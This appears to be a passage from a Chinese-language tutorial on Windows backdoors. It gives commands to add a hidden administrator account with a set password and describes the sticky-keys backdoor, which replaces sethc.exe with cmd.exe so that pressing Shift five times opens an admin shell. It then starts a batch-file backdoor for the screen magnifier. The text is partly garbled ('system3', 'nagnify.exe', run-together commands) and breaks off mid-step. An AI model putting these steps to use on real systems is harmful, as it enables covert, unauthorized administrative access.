netuseradministratorwoaijiushi/addnetlocalgroupadministratorsadministrator/add
PS:通过在用户后面添加符号的形式将用户达到隐藏的效果。
可以通过注册表或直接用户管理删除隐藏的用户。
0xShift后门将C:\WINDOWS\system3\dllcache\sethc.exe删除,这个文件夹中放着缓存,如果不删除就会自动变回去。
删除C:\WINDOWS\system3\下的sethc.exe文件。
重命名C:\WINDOWS\system3\下的cmd.exe为sethc.exe。
按下5下shift即可弹出管理权限的DOS窗口。
0x3放大镜后门创建magnify.bat
echooffnetuseradministratorwoaijiushi/addnetlocalgroupadministratorshack/add%Windir%\system3\nagnify.exeexit利用bat
#将magnify.bat转换成magnify.
#将magnify.